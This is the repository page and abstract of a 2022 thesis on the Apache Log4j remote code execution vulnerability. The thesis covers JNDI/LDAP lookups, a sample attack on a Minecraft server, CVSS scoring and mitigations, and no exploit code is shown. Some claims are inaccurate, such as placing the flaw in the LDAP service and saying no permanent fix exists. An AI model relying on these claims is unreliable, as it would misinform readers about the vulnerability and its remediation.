Apache Log4j Logging Framework and its Vulnerability
Agarwal, Yash (2022)
2022
All rights reserved. This publication is copyrighted. You may download, display and print it for Your own personal use. Commercial use is prohibited.
Julkaisun pysyvä osoite on
https://urn.fi/URN:NBN:fi:amk-202303063124
https://urn.fi/URN:NBN:fi:amk-202303063124
Tiivistelmä
Apache Log4j (or Log4j) is a logging framework written in Java, developed by Apache to provide Logging activities for the web server. It has Java JNDI (Java Naming and Directory Interface API) lookup which provides Naming-lookup and Directory mapping feature. It uses LDAP (Lightweight Directory Access Protocol) query to identify different services and Java applications running on a platform together so that they can share resources and communicate with each other thereby avoiding the need of deploying same services for different applications.
The LDAP service has a vulnerability that allows an attacker to craft queries. These queries can be used to execute commands on the platform such as reading logs, querying services, and performing other, possibly malicious actions on it. The request forged in the LDAP query will be parsed by the JNDI API and will provide a way to remotely execute any command send by the attacker (Remote Execution Code). Various services, webservers developed by Microsoft, Oracle, Google running Java or Java applications were affected.
Aim of this thesis is to discuss Apache Log4j vulnerability currently present on the Log4j software (from version 2.0 to 2.14). A sample attack on a simple Minecraft server is also demonstrated to emulate the working of Log4j vulnerability in a real-life scenario.
It was important to shed some light to this vulnerability because of its harmful nature. The vulnerability caused havoc since it can be remotely executed (Remote Code Execution). CVSS (Common Vulnerability and Scoring System) analysis was also performed on this vulnerability to gain more insight on its working.
Some fixes and workarounds are also discussed since no permanent fix is available to this date. Log4j vulnerability scanning was also performed on author’s device (Windows and Linux) to check for applications affected by this vulnerability.
The LDAP service has a vulnerability that allows an attacker to craft queries. These queries can be used to execute commands on the platform such as reading logs, querying services, and performing other, possibly malicious actions on it. The request forged in the LDAP query will be parsed by the JNDI API and will provide a way to remotely execute any command send by the attacker (Remote Execution Code). Various services, webservers developed by Microsoft, Oracle, Google running Java or Java applications were affected.
Aim of this thesis is to discuss Apache Log4j vulnerability currently present on the Log4j software (from version 2.0 to 2.14). A sample attack on a simple Minecraft server is also demonstrated to emulate the working of Log4j vulnerability in a real-life scenario.
It was important to shed some light to this vulnerability because of its harmful nature. The vulnerability caused havoc since it can be remotely executed (Remote Code Execution). CVSS (Common Vulnerability and Scoring System) analysis was also performed on this vulnerability to gain more insight on its working.
Some fixes and workarounds are also discussed since no permanent fix is available to this date. Log4j vulnerability scanning was also performed on author’s device (Windows and Linux) to check for applications affected by this vulnerability.